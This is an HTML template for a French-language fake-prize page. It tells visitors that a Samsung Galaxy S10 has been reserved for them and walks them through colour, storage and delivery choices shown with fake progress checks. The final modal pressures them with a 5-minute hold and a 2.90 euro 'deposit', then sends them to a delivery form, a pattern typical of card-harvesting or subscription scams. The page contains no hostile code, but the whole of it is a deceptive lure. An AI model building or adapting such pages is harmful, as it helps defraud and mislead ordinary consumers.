<include src="../chunks/head.html"></include>
<body>
  <div id="page-wrapper" class="page-wrapper">
  <!-- Begin header -->
  <include src="../chunks/header.html"></include>
  <!-- End header -->
  <!-- Begin page body -->
  <div id="page-body" class="page-body js-index">
      <form action="https://google.com" class="main">
        <div class="loader">
          <span class="ouro ouro3">
            <span class="left"><span class="anim"></span></span>
            <span class="right"><span class="anim"></span></span>
          </span>
        </div>
        <div class="modal modal-first msg-modal" id="modal-1">
          <h2 class="modal-name">Confirmez des maintenant votre code</h2>
          <input type="text" class="input" name="code" value="">
          <p class="modal-text">Une fois le code confirmé, un Samsung Galaxy S10 vous sera réservé.</p>
          <button type="button" class="next-btn">Confirmer</button>
        </div>
        <div class="modal msg-modal mod-second" id="modal-2">
          <h2 class="modal-name mod-icon">
            <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
              <path fill-rule="evenodd" clip-rule="evenodd" d="M32 16C32 24.844 24.8428 32 16 32C7.15601 32 0 24.8428 0 16C0 7.15601 7.15723 0 16 0C24.844 0 32 7.15723 32 16ZM23.0728 10.9231C23.561 11.4114 23.561 12.2029 23.0728 12.6909L14.687 21.0769C14.1987 21.5649 13.4075 21.5649 12.9192 21.0769L8.92725 17.0847C8.43896 16.5967 8.43896 15.8052 8.92725 15.3171C9.41528 14.8289 10.2068 14.8289 10.6948 15.3171L13.803 18.4253L21.3049 10.9231C21.7932 10.4351 22.5847 10.4351 23.0728 10.9231ZM16 2.5C23.4612 2.5 29.5 8.53784 29.5 16C29.5 23.4612 23.4622 29.5 16 29.5C8.53882 29.5 2.5 23.4622 2.5 16C2.5 8.53882 8.53784 2.5 16 2.5Z" fill="#DF0000"/>
            </svg>
            Felicitations
          </h2>
          <p class="selected-item-text">(1) SAMSUNG GALAXY S10 VOUS A ÉTÉ RÉSERVÉ AVEC SUCCÈS</p>
          <p class="modal-text">Vous pouvez à présent choisir vos préférences pour votre téléphone.</p>
          <button type="button" class="next-btn">Confirmer</button>
        </div>
        <div class="modal mod-third" id="modal-3">
          <h2 class="modal-name">Choisissez la couleur de votre téléphone</h2>
          <div class="modal-row">
            <div class="modal-row-left">
              <img class="item-img" src="assets/img/item.jpg" alt="">
            </div>
            <div class="modal-row-right">
              <label class="radio-label">
                <input type="radio" class="radio" data-src="assets/img/item.jpg" checked name="color">
                <span class="radio-icon"></span>
                <span class="radio-text">Prism Blue</span>
                <span class="radio-color" style="background-color: #235AA7;"></span>
              </label>
              <label class="radio-label">
                <input type="radio" class="radio" data-src="assets/img/item-2.jpg" name="color">
                <span class="radio-icon"></span>
                <span class="radio-text">Prism White</span>
                <span class="radio-color" style="background: #D6EEF1;"></span>
              </label>
              <label class="radio-label">
                <input type="radio" class="radio" data-src="assets/img/item.jpg" name="color">
                <span class="radio-icon"></span>
                <span class="radio-text">Prism Black</span>
                <span class="radio-color" style="background: #010101;"></span>
              </label>
              <button type="button" class="next-btn">Confirm</button>
            </div>
          </div>
        </div>
        <div class="modal mod-forth" id="modal-4">
          <h2 class="modal-name">Choisissez la capacité de stockage de<br>
              votre téléphone</h2>
          <div class="modal-row">
            <div class="modal-row-left">
              <img class="item-img" src="assets/img/item.jpg" alt="">
            </div>
            <div class="modal-row-right">
              <label class="radio-label">
                <input type="radio" class="radio" checked name="memory">
                <span class="radio-icon"></span>
                <span class="radio-text">128 Gb</span>
              </label>
              <label class="radio-label">
                <input type="radio" class="radio" name="memory">
                <span class="radio-icon"></span>
                <span class="radio-text">512 Gb</span>
              </label>
              <button type="button" class="next-btn">Confirm</button>
            </div>
          </div>
        </div>
        <div class="modal mod-fiveth" id="modal-5">
          <h2 class="modal-name">Choisissez une option de livraison</h2>
          <div class="modal-row">
            <div class="modal-row-left">
              <img class="item-img" src="assets/img/item.jpg" alt="">
            </div>
            <div class="modal-row-right">
              <label class="radio-label mod-delivery">
                <input type="radio" class="radio" checked name="delivery">
                <span class="radio-icon"></span>
                <span>
                  <span class="radio-text">La Poste (jusqu'à 5 jours ouvrés)</span>
                  <img class="delivery-img" src="assets/img/delivery-1.jpg" alt="">
                </span>
              </label>
              <label class="radio-label mod-delivery">
                <input type="radio" class="radio" name="delivery">
                <span class="radio-icon"></span>
                <span>
                  <span class="radio-text">DHL (jusqu'à 3 jours ouvrés)</span>
                  <img class="delivery-img" src="assets/img/delivery-2.jpg" alt="">
                </span>
              </label>
              <button type="button" class="next-btn">Confirm</button>
            </div>
          </div>
        </div>
        <div class="modal mod-progress" id="modal-6">
          <h2 class="modal-name">Merci</h2>
          <h3 class="modal-subname">Sauvegarde de vos preferences</h3>
          <div class="progress">
            <img class="progress-logo" src="assets/img/svg/progress-logo.svg" alt="">
            <div class="progress-bar"></div>
          </div>
          <div class="checked-list">
            <p class="checked-item">
              <svg width="16" height="16" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                <path fill-rule="evenodd" clip-rule="evenodd" d="M32 16C32 24.844 24.8428 32 16 32C7.15601 32 0 24.8428 0 16C0 7.15601 7.15723 0 16 0C24.844 0 32 7.15723 32 16ZM23.0728 10.9231C23.561 11.4114 23.561 12.2029 23.0728 12.6909L14.687 21.0769C14.1987 21.5649 13.4075 21.5649 12.9192 21.0769L8.92725 17.0847C8.43896 16.5967 8.43896 15.8052 8.92725 15.3171C9.41528 14.8289 10.2068 14.8289 10.6948 15.3171L13.803 18.4253L21.3049 10.9231C21.7932 10.4351 22.5847 10.4351 23.0728 10.9231ZM16 2.5C23.4612 2.5 29.5 8.53784 29.5 16C29.5 23.4612 23.4622 29.5 16 29.5C8.53882 29.5 2.5 23.4622 2.5 16C2.5 8.53882 8.53784 2.5 16 2.5Z" fill="#DF0000"/>
              </svg>
              Aucune autre inscription trouvée
            </p>
            <p class="checked-item">
              <svg width="16" height="16" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                <path fill-rule="evenodd" clip-rule="evenodd" d="M32 16C32 24.844 24.8428 32 16 32C7.15601 32 0 24.8428 0 16C0 7.15601 7.15723 0 16 0C24.844 0 32 7.15723 32 16ZM23.0728 10.9231C23.561 11.4114 23.561 12.2029 23.0728 12.6909L14.687 21.0769C14.1987 21.5649 13.4075 21.5649 12.9192 21.0769L8.92725 17.0847C8.43896 16.5967 8.43896 15.8052 8.92725 15.3171C9.41528 14.8289 10.2068 14.8289 10.6948 15.3171L13.803 18.4253L21.3049 10.9231C21.7932 10.4351 22.5847 10.4351 23.0728 10.9231ZM16 2.5C23.4612 2.5 29.5 8.53784 29.5 16C29.5 23.4612 23.4622 29.5 16 29.5C8.53882 29.5 2.5 23.4622 2.5 16C2.5 8.53882 8.53784 2.5 16 2.5Z" fill="#DF0000"/>
              </svg>
              Préférences sauvegardées
            </p>
            <p class="checked-item">
              <svg width="16" height="16" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                <path fill-rule="evenodd" clip-rule="evenodd" d="M32 16C32 24.844 24.8428 32 16 32C7.15601 32 0 24.8428 0 16C0 7.15601 7.15723 0 16 0C24.844 0 32 7.15723 32 16ZM23.0728 10.9231C23.561 11.4114 23.561 12.2029 23.0728 12.6909L14.687 21.0769C14.1987 21.5649 13.4075 21.5649 12.9192 21.0769L8.92725 17.0847C8.43896 16.5967 8.43896 15.8052 8.92725 15.3171C9.41528 14.8289 10.2068 14.8289 10.6948 15.3171L13.803 18.4253L21.3049 10.9231C21.7932 10.4351 22.5847 10.4351 23.0728 10.9231ZM16 2.5C23.4612 2.5 29.5 8.53784 29.5 16C29.5 23.4612 23.4622 29.5 16 29.5C8.53882 29.5 2.5 23.4622 2.5 16C2.5 8.53882 8.53784 2.5 16 2.5Z" fill="#DF0000"/>
              </svg>
              Préférences approuvées
            </p>
          </div>
        </div>
        <div class="modal mod-seventh" id="modal-7">
          <h2 class="modal-name">FÉLICITATIONS!!</h2>
          <div class="modal-row">
            <div class="modal-row-left">
              <img class="item-img" src="assets/img/item.jpg" alt="">
            </div>
            <div class="modal-row-right">
              <p class="modal-last-text">Votre SAMSUNG GALAXY S10 a été réservé pour une période de 5 minutes!<br>
                <br>
                Si vous ne réclamez pas votre Smartphone durant cette période, il sera donnée au client chanceux suivant</p>
              <p class="modal-text">*Rappel: un dépôt de 2,90 euro vous sera facturé pour nous assurer que vous résidez en France.</p>
              <button type="submit" class="next-btn last-btn">CONTINUER JUSQU'AU FORMULAIRE DE LIVRAISON</button>
            </div>
          </div>
        </div>
      </form>
  </div> 
  <!-- End page body -->
  <!-- Begin footer -->
  <include src="../chunks/footer.html"></include>
  <!-- End footer -->
  <!-- Begin modals -->
  <include src="../chunks/modals.html"></include>
  <!-- End modals -->
  </div>
  <!-- Begin script -->
  <include src="../chunks/scripts.html"></include>
  <!-- End script -->
</body>
</html>
